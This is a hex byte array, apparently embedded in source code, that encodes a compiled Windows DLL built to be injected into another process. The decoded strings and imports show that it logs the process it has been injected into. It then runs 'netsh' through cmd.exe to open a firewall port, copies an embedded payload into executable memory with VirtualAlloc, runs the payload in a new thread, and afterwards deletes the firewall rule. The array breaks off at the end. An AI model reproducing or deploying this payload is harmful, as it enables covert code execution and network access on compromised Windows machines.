0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xff,0x54,0x24,0x04,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x81,0xec,0x1c,0x01,0x00,0x00,0x56,0x57,0xc7,0x85,0xe8,0xfe,0xff,\r\n0xff,0x00,0x00,0x00,0x00,0xff,0x15,0x24,0x20,0x00,0x10,0x50,0xff,0x15,0x20,0x20,\r\n0x00,0x10,0x50,0x68,0x8c,0x20,0x00,0x10,0x6a,0x16,0x68,0xb0,0x20,0x00,0x10,0xe8,\r\n0x7c,0x03,0x00,0x00,0x83,0xc4,0x14,0x68,0x5c,0x11,0x00,0x00,0x68,0xc0,0x20,0x00,\r\n0x10,0x6a,0x1a,0x68,0xf8,0x20,0x00,0x10,0xe8,0x63,0x03,0x00,0x00,0x83,0xc4,0x10,\r\n0x68,0x5c,0x11,0x00,0x00,0x68,0x08,0x21,0x00,0x10,0x8d,0x85,0xf0,0xfe,0xff,0xff,\r\n0x50,0xff,0x15,0x64,0x20,0x00,0x10,0x83,0xc4,0x0c,0x6a,0x00,0x8d,0x8d,0xf0,0xfe,\r\n0xff,0xff,0x51,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,\r\n0x95,0xec,0xfe,0xff,0xff,0x52,0x68,0x40,0x21,0x00,0x10,0x6a,0x21,0x68,0x64,0x21,\r\n0x00,0x10,0xe8,0x19,0x03,0x00,0x00,0x83,0xc4,0x10,0x6a,0x40,0x68,0x00,0x30,0x00,\r\n0x00,0x68,0x2b,0x01,0x00,0x00,0x6a,0x00,0xff,0x15,0x18,0x20,0x00,0x10,0x89,0x45,\r\n0xfc,0x83,0x7d,0xfc,0x00,0x0f,0x84,0xa1,0x00,0x00,0x00,0x8b,0x45,0xfc,0x50,0x68,\r\n0x2b,0x01,0x00,0x00,0x68,0x74,0x21,0x00,0x10,0x6a,0x28,0x68,0xac,0x21,0x00,0x10,\r\n0xe8,0xdb,0x02,0x00,0x00,0x83,0xc4,0x14,0xb9,0x4a,0x00,0x00,0x00,0xbe,0x00,0x30,\r\n0x00,0x10,0x8b,0x7d,0xfc,0xf3,0xa5,0x66,0xa5,0xa4,0x6a,0x00,0x6a,0x00,0x8b,0x4d,\r\n0xfc,0x51,0x68,0x00,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,\r\n0x10,0x89,0x85,0xe4,0xfe,0xff,0xff,0x83,0xbd,0xe4,0xfe,0xff,0xff,0x00,0x74,0x1e,\r\n0x6a,0xff,0x8b,0x95,0xe4,0xfe,0xff,0xff,0x52,0xff,0x15,0x10,0x20,0x00,0x10,0x8b,\r\n0x85,0xe4,0xfe,0xff,0xff,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,\r\n0x08,0x20,0x00,0x10,0x50,0x68,0xbc,0x21,0x00,0x10,0x6a,0x38,0x68,0xd8,0x21,0x00,\r\n0x10,0xe8,0x6a,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,\r\n0x8b,0x4d,0xfc,0x51,0xff,0x15,0x30,0x20,0x00,0x10,0xeb,0x1b,0xff,0x15,0x08,0x20,\r\n0x00,0x10,0x50,0x68,0xe8,0x21,0x00,0x10,0x6a,0x3f,0x68,0x04,0x22,0x00,0x10,0xe8,\r\n0x3c,0x02,0x00,0x00,0x83,0xc4,0x10,0x68,0x14,0x22,0x00,0x10,0x6a,0x43,0x68,0x40,\r\n0x22,0x00,0x10,0xe8,0x28,0x02,0x00,0x00,0x83,0xc4,0x0c,0x6a,0x00,0x68,0x50,0x22,\r\n0x00,0x10,0xff,0x15,0x1c,0x20,0x00,0x10,0x89,0x85,0xec,0xfe,0xff,0xff,0x8b,0x95,\r\n0xec,0xfe,0xff,0xff,0x52,0x68,0x90,0x22,0x00,0x10,0x6a,0x45,0x68,0xb4,0x22,0x00,\r\n0x10,0xe8,0xfa,0x01,0x00,0x00,0x83,0xc4,0x10,0x68,0xc4,0x22,0x00,0x10,0x6a,0x47,\r\n0x68,0xd8,0x22,0x00,0x10,0xe8,0xe6,0x01,0x00,0x00,0x83,0xc4,0x0c,0xff,0xb5,0xe8,\r\n0xfe,0xff,0xff,0x68,0x00,0x80,0x00,0x00,0x6a,0x00,0xff,0x75,0x08,0xff,0x35,0x5c,\r\n0x20,0x00,0x10,0xa1,0x30,0x20,0x00,0x10,0xff,0xe0,0x8b,0x85,0xe8,0xfe,0xff,0xff,\r\n0x5f,0x5e,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x56,0x8b,0x74,0x24,0x08,0x57,0x8b,0x7c,0x24,0x14,0x33,0xc0,0x85,0xff,0x76,0x08,\r\n0x88,0x04,0x30,0x40,0x3b,0xc7,0x72,0xf8,0x33,0xc0,0x85,0xff,0x76,0x13,0x8a,0x4c,\r\n0x24,0x10,0x8a,0x14,0x30,0x32,0xd0,0x02,0xd1,0x88,0x14,0x30,0x40,0x3b,0xc7,0x72,\r\n0xf1,0x5f,0x5e,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x8b,0x44,0x24,0x08,0x81,0xec,0x10,0x02,0x00,0x00,0x83,0xe8,0x01,0x0f,0x85,0xe4,\r\n0x00,0x00,0x00,0x56,0x57,0x68,0x04,0x01,0x00,0x00,0x8d,0x84,0x24,0x18,0x01,0x00,\r\n0x00,0x50,0x6a,0x00,0xc7,0x44,0x24,0x18,0x04,0x01,0x00,0x00,0xff,0x15,0x58,0x20,\r\n0x00,0x10,0x50,0xff,0x15,0x2c,0x20,0x00,0x10,0x8d,0x4c,0x24,0x0c,0x51,0x8d,0x54,\r\n0x24,0x14,0x52,0xff,0x15,0x00,0x20,0x00,0x10,0x8d,0x44,0x24,0x10,0x50,0xff,0x15,\r\n0x20,0x20,0x00,0x10,0x50,0x8d,0x8c,0x24,0x1c,0x01,0x00,0x00,0x51,0x68,0xe8,0x22,\r\n0x00,0x10,0x6a,0x7e,0x68,0x28,0x23,0x00,0x10,0xe8,0x02,0x01,0x00,0x00,0x8b,0xbc,\r\n0x24,0x34,0x02,0x00,0x00,0x8b,0x77,0x3c,0x83,0xc4,0x18,0x8d,0x54,0x24,0x08,0x52,\r\n0x03,0xf7,0xc7,0x44,0x24,0x0c,0x00,0x00,0x00,0x00,0x8b,0x46,0x54,0x6a,0x04,0x50,\r\n0x57,0xff,0x15,0x28,0x20,0x00,0x10,0x85,0xc0,0x74,0x0f,0x8b,0x4e,0x54,0x51,0x6a,\r\n0x00,0x57,0xe8,0x19,0xff,0xff,0xff,0x83,0xc4,0x0c,0x6a,0x00,0x6a,0x00,0x57,0x68,\r\n0x10,0x10,0x00,0x10,0x6a,0x00,0x6a,0x00,0xff,0x15,0x14,0x20,0x00,0x10,0x5f,0x5e,\r\n0x85,0xc0,0x74,0x15,0x50,0xff,0x15,0x0c,0x20,0x00,0x10,0xb8,0x01,0x00,0x00,0x00,\r\n0x81,0xc4,0x10,0x02,0x00,0x00,0xc2,0x0c,0x00,0xff,0x15,0x08,0x20,0x00,0x10,0x50,\r\n0x68,0x38,0x23,0x00,0x10,0x68,0x94,0x00,0x00,0x00,0x68,0x54,0x23,0x00,0x10,0xe8,\r\n0x7c,0x00,0x00,0x00,0x83,0xc4,0x10,0xb8,0x01,0x00,0x00,0x00,0x81,0xc4,0x10,0x02,\r\n0x00,0x00,0xc2,0x0c,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x6a,0x40,0x68,0x64,0x23,0x00,0x10,0x68,0x6c,0x23,0x00,0x10,0x6a,0x00,0xff,0x15,\r\n0x68,0x20,0x00,0x10,0x6a,0x00,0xff,0x15,0x34,0x20,0x00,0x10,0xcc,0xcc,0xcc,0xcc,\r\n0x53,0x8b,0x1d,0x38,0x20,0x00,0x10,0x55,0x56,0x57,0x8b,0x7c,0x24,0x14,0x57,0x8b,\r\n0xef,0x33,0xf6,0xff,0xd3,0x85,0xc0,0x7e,0x1e,0x8d,0xa4,0x24,0x00,0x00,0x00,0x00,\r\n0x8a,0x04,0x3e,0x3c,0x5c,0x74,0x04,0x3c,0x2f,0x75,0x04,0x8d,0x6c,0x3e,0x01,0x57,\r\n0x46,0xff,0xd3,0x3b,0xf0,0x7c,0xe9,0x5f,0x5e,0x8b,0xc5,0x5d,0x5b,0xc3,0xcc,0xcc,\r\n0x51,0x56,0x8b,0x35,0x54,0x20,0x00,0x10,0x57,0x68,0x7c,0x23,0x00,0x10,0x68,0x84,\r\n0x23,0x00,0x10,0xff,0xd6,0x8b,0x3d,0x50,0x20,0x00,0x10,0x50,0xff,0xd7,0x89,0x44,\r\n0x24,0x08,0x85,0xc0,0x0f,0x84,0xf1,0x00,0x00,0x00,0x55,0x68,0x90,0x23,0x00,0x10,\r\n0x68,0x9c,0x23,0x00,0x10,0xff,0xd6,0x50,0xff,0xd7,0x8b,0xe8,0x85,0xed,0x0f,0x84,\r\n0xd6,0x00,0x00,0x00,0x68,0xa8,0x23,0x00,0x10,0x68,0xb4,0x23,0x00,0x10,0xff,0xd6,\r\n0x50,0xff,0xd7,0x85,0xc0,0x0f,0x84,0xbf,0x00,0x00,0x00,0x8b,0x54,0x24,0x1c,0x53,\r\n0x8d,0x4c,0x24,0x24,0x51,0x52,0xff,0xd0,0x8b,0x1d,0x4c,0x20,0x00,0x10,0x8b,0xf8,\r\n0x83,0xc4,0x08,0x81,0xc7,0x00,0x01,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf0,\r\n0x85,0xf6,0x0f,0x84,0x91,0x00,0x00,0x00,0x57,0x6a,0x00,0xff,0xd3,0x8b,0xf8,0x85,\r\n0xff,0x75,0x0d,0x56,0xff,0x15,0x48,0x20,0x00,0x10,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,\r\n0x8b,0x4c,0x24,0x20,0x8d,0x44,0x24,0x24,0x50,0x51,0x56,0xff,0xd5,0x8b,0x54,0x24,\r\n0x28,0x8b,0x44,0x24,0x24,0x83,0xc4,0x0c,0x56,0x52,0x50,0xe8,0x00,0xff,0xff,0xff,\r\n0x83,0xc4,0x04,0x50,0xff,0x15,0x20,0x20,0x00,0x10,0x50,0x68,0xc0,0x23,0x00,0x10,\r\n0x57,0xff,0x54,0x24,0x28,0x83,0xc4,0x18,0x57,0xff,0x15,0x44,0x20,0x00,0x10,0x6a,\r\n0xf5,0xff,0x15,0x40,0x20,0x00,0x10,0x8b,0xd8,0x83,0xfb,0xff,0x74,0x1f,0x6a,0x00,\r\n0x8d,0x4c,0x24,0x14,0x51,0x56,0xc7,0x44,0x24,0x1c,0x00,0x00,0x00,0x00,0xff,0x15,\r\n0x38,0x20,0x00,0x10,0x50,0x56,0x53,0xff,0x15,0x3c,0x20,0x00,0x10,0x57,0x8b,0x3d,\r\n0x48,0x20,0x00,0x10,0xff,0xd7,0x56,0xff,0xd7,0x5b,0x5d,0x5f,0x5e,0x59,0xc3,0xcc,\r\n0xff,0x25,0x5c,0x20,0x00,0x10,0xff,0x25,0x30,0x20,0x00,0x10,0xff,0x25,0x08,0x20,\r\n0x00,0x10,0xff,0x25,0x0c,0x20,0x00,0x10,0xff,0x25,0x10,0x20,0x00,0x10,0xff,0x25,\r\n0x14,0x20,0x00,0x10,0xff,0x25,0x18,0x20,0x00,0x10,0xff,0x25,0x1c,0x20,0x00,0x10,\r\n0xff,0x25,0x20,0x20,0x00,0x10,0xff,0x25,0x24,0x20,0x00,0x10,0xff,0x25,0x28,0x20,\r\n0x00,0x10,0xff,0x25,0x2c,0x20,0x00,0x10,0xff,0x25,0x58,0x20,0x00,0x10,0xff,0x25,\r\n0x34,0x20,0x00,0x10,0xff,0x25,0x38,0x20,0x00,0x10,0xff,0x25,0x3c,0x20,0x00,0x10,\r\n0xff,0x25,0x40,0x20,0x00,0x10,0xff,0x25,0x44,0x20,0x00,0x10,0xff,0x25,0x48,0x20,\r\n0x00,0x10,0xff,0x25,0x4c,0x20,0x00,0x10,0xff,0x25,0x50,0x20,0x00,0x10,0xff,0x25,\r\n0x54,0x20,0x00,0x10,0xff,0x25,0x64,0x20,0x00,0x10,0xff,0x25,0x68,0x20,0x00,0x10,\r\n0xff,0x25,0x00,0x20,0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,\r\n0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,\r\n0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,\r\n0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,\r\n0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,\r\n0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x02,0x00,0x00,0x00,\r\n0x61,0x00,0x00,0x00,0xb0,0x26,0x00,0x00,0xb0,0x10,0x00,0x00,0x4d,0x61,0x69,0x6e,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x54,0x68,0x72,0x65,0x61,0x64,\r\n0x20,0x25,0x78,0x3a,0x25,0x78,0x20,0x73,0x74,0x61,0x72,0x74,0x65,0x64,0x0a,0x00,\r\n0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x41,0x64,\r\n0x64,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x72,0x75,\r\n0x6c,0x65,0x20,0x66,0x6f,0x72,0x20,0x54,0x43,0x50,0x20,0x70,0x6f,0x72,0x74,0x20,\r\n0x25,0x64,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,\r\n0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,0x20,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,\r\n0x6c,0x20,0x61,0x64,0x64,0x20,0x70,0x6f,0x72,0x74,0x6f,0x70,0x65,0x6e,0x69,0x6e,\r\n0x67,0x20,0x54,0x43,0x50,0x20,0x25,0x64,0x20,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f,\r\n0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25,\r\n0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x41,0x6c,0x6c,0x6f,0x63,0x61,0x74,0x65,0x64,0x20,0x25,0x64,0x20,0x62,\r\n0x79,0x74,0x65,0x73,0x20,0x66,0x6f,0x72,0x20,0x70,0x61,0x79,0x6c,0x6f,0x61,0x64,\r\n0x20,0x61,0x74,0x20,0x30,0x78,0x25,0x78,0x0a,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,\r\n0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,\r\n0x74,0x65,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,\r\n0x20,0x25,0x64,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x41,\r\n0x6c,0x6c,0x6f,0x63,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a,\r\n0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x44,0x65,0x6c,0x65,0x74,0x69,0x6e,0x67,0x20,0x66,0x69,0x72,0x65,0x77,\r\n0x61,0x6c,0x6c,0x20,0x72,0x75,0x6c,0x65,0x2e,0x2e,0x2e,0x0a,0x00,0x00,0x00,0x00,\r\n0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,\r\n0x63,0x6d,0x64,0x2e,0x65,0x78,0x65,0x20,0x2f,0x43,0x20,0x6e,0x65,0x74,0x73,0x68,\r\n0x20,0x61,0x64,0x76,0x66,0x69,0x72,0x65,0x77,0x61,0x6c,0x6c,0x20,0x66,0x69,0x72,\r\n0x65,0x77,0x61,0x6c,0x6c,0x20,0x64,0x65,0x6c,0x65,0x74,0x65,0x20,0x72,0x75,0x6c,\r\n0x65,0x20,0x6e,0x61,0x6d,0x65,0x3d,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x00,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f,\r\n0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25,\r\n0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x45,0x58,0x49,0x54,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x28,\r\n0x29,0x3a,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x65,0x64,0x20,0x69,0x6e,0x74,0x6f,\r\n0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x22,0x25,0x73,0x22,0x20,0x28,0x50,\r\n0x49,0x44,0x3d,0x25,0x64,0x29,0x2c,0x20,0x55,0x73,0x65,0x72,0x20,0x3d,0x20,0x22,\r\n0x25,0x73,0x22,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a,\r\n0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x44,0x75,0x6d,0x6d,0x79,0x28,0x29,0x00,0x3c,0x4f,0x4b,0x3e,\r\n0x20,0x74,0x6f,0x20,0x65,0x78,0x69,0x74,0x2e,0x2e,0x2e,0x00,0x73,0x70,0x72,0x69,\r\n0x6e,0x74,0x66,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x76,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x00,0x00,0x00,0x6d,0x73,0x76,0x63,\r\n0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5f,0x76,0x73,0x63,0x70,0x72,0x69,0x6e,\r\n0x74,0x66,0x00,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x5b,0x25,0x2e,0x35,0x64,0x5d,0x20,0x2e,0x5c,0x25,0x73,0x28,0x25,0x64,0x29,0x20,\r\n0x3a,0x20,0x25,0x73,0x00,0x00,0x00,0x00,0x30,0x24,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x02,0x26,0x00,0x00,0x08,0x20,0x00,0x00,0x8c,0x24,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x2a,0x26,0x00,0x00,0x64,0x20,0x00,0x00,\r\n0x28,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x26,0x00,0x00,\r\n0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,\r\n0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,\r\n0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,\r\n0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,\r\n0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,\r\n0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,\r\n0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x01,0x45,0x78,0x69,0x74,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x00,0x00,0x57,0x04,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x46,\r\n0x72,0x65,0x65,0x00,0xe6,0x01,0x47,0x65,0x74,0x4c,0x61,0x73,0x74,0x45,0x72,0x72,\r\n0x6f,0x72,0x00,0x00,0x43,0x00,0x43,0x6c,0x6f,0x73,0x65,0x48,0x61,0x6e,0x64,0x6c,\r\n0x65,0x00,0x64,0x04,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x53,0x69,0x6e,0x67,0x6c,\r\n0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xa3,0x00,0x43,0x72,0x65,0x61,0x74,0x65,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x00,0x00,0x54,0x04,0x56,0x69,0x72,0x74,0x75,0x61,\r\n0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,0x7b,0x04,0x57,0x69,0x6e,0x45,0x78,0x65,\r\n0x63,0x00,0xaa,0x01,0x47,0x65,0x74,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x50,0x72,\r\n0x6f,0x63,0x65,0x73,0x73,0x49,0x64,0x00,0xad,0x01,0x47,0x65,0x74,0x43,0x75,0x72,\r\n0x72,0x65,0x6e,0x74,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,0x00,0x00,0x5a,0x04,\r\n0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x50,0x72,0x6f,0x74,0x65,0x63,0x74,0x00,0x00,\r\n0xf4,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x46,0x69,0x6c,0x65,0x4e,\r\n0x61,0x6d,0x65,0x41,0x00,0x00,0xf6,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,\r\n0x65,0x48,0x61,0x6e,0x64,0x6c,0x65,0x41,0x00,0x00,0x04,0x01,0x45,0x78,0x69,0x74,\r\n0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0xb5,0x04,0x6c,0x73,0x74,0x72,0x6c,0x65,\r\n0x6e,0x41,0x00,0x00,0x8d,0x04,0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6c,0x65,0x00,\r\n0x3b,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6e,0x64,0x6c,0x65,0x00,0x00,\r\n0x3a,0x03,0x4f,0x75,0x74,0x70,0x75,0x74,0x44,0x65,0x62,0x75,0x67,0x53,0x74,0x72,\r\n0x69,0x6e,0x67,0x41,0x00,0x00,0xfd,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x46,0x72,0x65,\r\n0x65,0x00,0xf9,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,\r\n0x20,0x02,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73,\r\n0x00,0x00,0xf1,0x02,0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x61,0x72,0x79,0x41,\r\n0x00,0x00,0x4b,0x45,0x52,0x4e,0x45,0x4c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0